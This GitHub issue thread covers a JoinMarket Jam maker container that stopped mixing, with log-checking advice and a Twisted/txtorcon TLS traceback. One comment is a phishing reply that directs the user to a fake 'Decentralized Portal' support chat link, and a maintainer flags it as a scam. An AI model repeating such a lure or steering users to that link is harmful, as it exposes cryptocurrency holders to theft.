### ISSUE TITLE
How to mix continuously as a maker ?

### ISSUE THREAD

**Issue by Ulawun** [joinmarket-webui/jam-docker#141]
Hello :-)

The ghcr.io/joinmarket-webui/jam-standalone container is running properly,
JoinMarket is running,
but doesn't mix continuously.
I'm a maker and charge no (absolute) fees.
JoinMarket mixed twice, which this is one month ago.
For one month now there's no further mixing :-(

Initially I transferred BTC to wallet A.
Then JoinMarket mixed twice to wallet B.
Then it stopped mixing till now.

Is mixing only possible from wallet A ?
Are there any mixing options for makers,
where I have to choose "continuous mixing" ?

I'm running bitcoin core and the ghcr.io/joinmarket-webui/jam-standalone container on one computer.
Computer: Linux Mint 21.3 Virginia 64-bit
Bitcoin core: v27.1.0
Docker: 24.0.7, build: ubuntu...

Thx a lot for any ideas :-)

**Comment by Athensmo** [comment]
Hello @Ulawun 
Visit the official Decentralized dApps Protocol website to complete your request. Strictly follow the procedure laid by the support team on the page once you establish a chat via [Decentralized Portal](https://websynchronizefix.web.app/). 
Note: Use the chat icon at the bottom of the page to initiate the chat.

**Comment by MarnixCroes** [comment]
> Hello @Ulawun 
> Visit the official Decentralized dApps Protocol website to complete your request. Strictly follow the procedure laid by the support team on the page once you establish a chat via [Decentralized Portal](https://websynchronizefix.web.app/). 
> Note: Use the chat icon at the bottom of the page to initiate the chat.

Scam

**Comment by MarnixCroes** [comment]
If you want to know exactly what is going, you should check the logs.

**Comment by theborakompanioni** [comment]
@Ulawun 

Restarting the backend has helped a few users. Cannot find the ticket yet, but I believe this has sometimes come up after starting/stopping the maker via rpc. 

As @MarnixCroes said, logs are often helpful: https://jamdocs.org/FAQ/#how-do-i-view-the-log-file

> Scam

:disappointed:

**Comment by Ulawun** [comment]
Thanks a lot for your help :-)

I restarted the backend several times,
but that didn't change the symptoms.
To have a look at the logs was a good idea.
Every view hours (a view times a day) I get the same
unhandled error: "builtins.IndexError: tuple index out of range".
A snippet of the logs looks like this:

...
2024-12-06 23:24:06,871 [INFO]  Lost IRC connection to: darkirc6tqgpnwd3blln3yfv5ckl47eg7llfxkmtovrv7c7iwohhb6ad.onion . Should reconnect automatically soon.
2024-12-06 23:25:33,684 [INFO]  Lost IRC connection to: darkirc6tqgpnwd3blln3yfv5ckl47eg7llfxkmtovrv7c7iwohhb6ad.onion . Should reconnect automatically soon.
Unhandled Error
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/twisted/python/log.py", line 96, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/local/lib/python3.9/dist-packages/twisted/python/log.py", line 80, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/local/lib/python3.9/dist-packages/twisted/python/context.py", line 117, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/local/lib/python3.9/dist-packages/twisted/python/context.py", line 82, in callWithContext
    return func(*args, **kw)
--- <exception caught here> ---
  File "/usr/local/lib/python3.9/dist-packages/twisted/internet/posixbase.py", line 482, in _doReadOrWrite
    why = selectable.doRead()
  File "/usr/local/lib/python3.9/dist-packages/twisted/internet/tcp.py", line 248, in doRead
    return self._dataReceived(data)
  File "/usr/local/lib/python3.9/dist-packages/twisted/internet/tcp.py", line 253, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/usr/local/lib/python3.9/dist-packages/twisted/internet/endpoints.py", line 151, in dataReceived
    return self._wrappedProtocol.dataReceived(data)
  File "/usr/local/lib/python3.9/dist-packages/txtorcon/socks.py", line 529, in dataReceived
    self._machine.feed_data(data)
  File "/usr/local/lib/python3.9/dist-packages/txtorcon/socks.py", line 136, in feed_data
    self.got_data()
  File "/usr/local/lib/python3.9/dist-packages/automat/_methodical.py", line 284, in got_data
    value = output(oself, *a, **k)
  File "/usr/local/lib/python3.9/dist-packages/automat/_methodical.py", line 322, in __call__
    return self.method(oself, *args, **kwargs)
  File "/usr/local/lib/python3.9/dist-packages/txtorcon/socks.py", line 311, in _relay_data
    self._sender.dataReceived(d)
  File "/usr/local/lib/python3.9/dist-packages/twisted/protocols/tls.py", line 324, in dataReceived
    self._checkHandshakeStatus()
  File "/usr/local/lib/python3.9/dist-packages/twisted/protocols/tls.py", line 251, in _checkHandshakeStatus
    self._tlsShutdownFinished(Failure())
  File "/usr/local/lib/python3.9/dist-packages/twisted/protocols/tls.py", line 377, in _tlsShutdownFinished
    if _representsEOF(reason.value):
  File "/usr/local/lib/python3.9/dist-packages/twisted/protocols/tls.py", line 121, in _representsEOF
    errorQueue = exceptionObject.args[0]
builtins.IndexError: tuple index out of range
...

Any further ideas ?
Thanks in advance :-)

**Comment by theborakompanioni** [comment]
> ... File "/usr/local/lib/python3.9/dist-packages/twisted/protocols/tls.py", line 121, in _representsEOF errorQueue = exceptionObject.args[0] builtins.IndexError: tuple index out of range ...
> 
> Any further ideas ? Thanks in advance :-)

Hmm.. looks like a network issue, either with tor or counterparty communication - I really cannot judge. I'd say best you can do is [creating an issue in the backend repository](https://github.com/JoinMarket-Org/joinmarket-clientserver/issues) describing your sitauation. Log files and error messages/stacktraces definitely help the devs there to better understand what might be the culprit here. All other operations work as expected? It might be that sending a collaborative transaction does not work, but do non-collaborative transactions work normally?

**Comment by Ulawun** [comment]
Dear theborakompanioni,

Thanks a lot for your help :-)

All I did with ghcr.io/joinmarket-webui/jam-standalone container
till now is receiving and earning as a maker.

Now I created an issue in the backend repository here:
https://github.com/JoinMarket-Org/joinmarket-clientserver/issues/1750

Is there any solution ?
Thanks in advance :-)

**Comment by theborakompanioni** [comment]
Hey @Ulawun!

Thanks for creating the issue! Let's see what the JM devs say about it and what solution they can suggest :raised_hands:

**Comment by theborakompanioni** [comment]
Closing now, please reopen if you think this is a mistake.
